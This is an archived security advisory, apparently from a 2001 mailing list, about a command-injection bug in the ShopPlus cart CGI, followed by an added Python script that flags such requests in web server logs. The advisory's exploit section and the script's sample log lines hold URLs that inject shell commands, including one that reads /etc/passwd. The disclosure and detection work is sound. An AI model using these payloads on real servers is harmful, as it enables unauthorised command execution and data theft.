------------[ advisory ]------------

name: ShopPlus Cart Bug

Information:
The ShopPlus shopping cart system allows you to build a store or a mall on the Internet. Because of its flexibility, it allows you to sell virtually any products or services and fully customize the shopping experience of your web site.
http://www.ksofttech.com/help/shopplus/

Problem:
The script doesn't check symbols. Any user can execute commands on the web server.

Exploit:
host/scripts/shopplus.cgi?dn=domainname.com&cartid=%CARTID%&file=;uid|
host/scripts/shopplus.cgi?dn=domainname.com&cartid=%CARTID%&file=;cat%20/etc/passwd|

Bug found by Kernel|X| and aLph4Num3ric

E-Mail: secureat_private [kernel|x|]
        alph4num3ricat_private [aLph4Num3ric]
WWW: www.russiahack.com / www.tmgroup.sh

------------
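Added example (not part of the original advisory, and not ShopPlus code): a Python check that scans web server access logs for requests to shopplus.cgi whose decoded file parameter is not a plain file name, which is the pattern of the requests listed above. The allowlist of what a legitimate file value looks like, the Common Log Format, and the sample log lines are assumptions constructed for the illustration.

```python
import re
from urllib.parse import urlsplit, unquote_plus

# Assumption: a legitimate `file` value is a bare file name such as "index.html".
SAFE_FILE = re.compile(r"[A-Za-z0-9_-]+(\.[A-Za-z0-9]+)?")
# Request field of a Common Log Format line (assumed log format).
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed sample log lines; client addresses are documentation-range IPs.
SAMPLE_LOG = [
    '192.0.2.10 - - [05/Sep/2001:10:00:01 -0700] "GET /scripts/shopplus.cgi'
    '?dn=domainname.com&cartid=1001&file=index.html HTTP/1.0" 200 5120',
    '192.0.2.77 - - [05/Sep/2001:10:02:13 -0700] "GET /scripts/shopplus.cgi'
    '?dn=domainname.com&cartid=1002&file=;cat%20/etc/passwd| HTTP/1.0" 200 812',
    '192.0.2.77 - - [05/Sep/2001:10:02:40 -0700] "GET /scripts/shopplus.cgi'
    '?dn=domainname.com&cartid=1002&file=%3Buid%7C HTTP/1.0" 200 0',
    '192.0.2.15 - - [05/Sep/2001:10:03:02 -0700] "GET /index.html HTTP/1.0" 200 100',
]

def is_safe_file_param(value):
    """Allowlist check: reject anything that is not a plain file name."""
    return SAFE_FILE.fullmatch(value) is not None

def file_values(query):
    """Yield the percent-decoded value of every `file` parameter in a query."""
    for pair in query.split("&"):
        key, _, raw = pair.partition("=")
        if unquote_plus(key) == "file":
            yield unquote_plus(raw)

def suspicious_requests(log_lines, script="shopplus.cgi"):
    """Return (client, decoded file value) for requests failing the allowlist."""
    hits = []
    for line in log_lines:
        m = REQUEST.search(line)
        if not m:
            continue
        url = urlsplit(m.group(1))
        if not url.path.endswith("/" + script):
            continue
        hits.extend((line.split()[0], v) for v in file_values(url.query)
                    if not is_safe_file_param(v))
    return hits

if __name__ == "__main__":
    for client, value in suspicious_requests(SAMPLE_LOG):
        print(f"{client} file={value!r}")
```

Decoding before matching means the percent-encoded form of the same request is flagged as well; the same allowlist function is the kind of check the script itself would need to apply to the parameter before using it.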
This archive was generated by hypermail 2b30 : Wed Sep 05 2001 - 12:34:04 PDT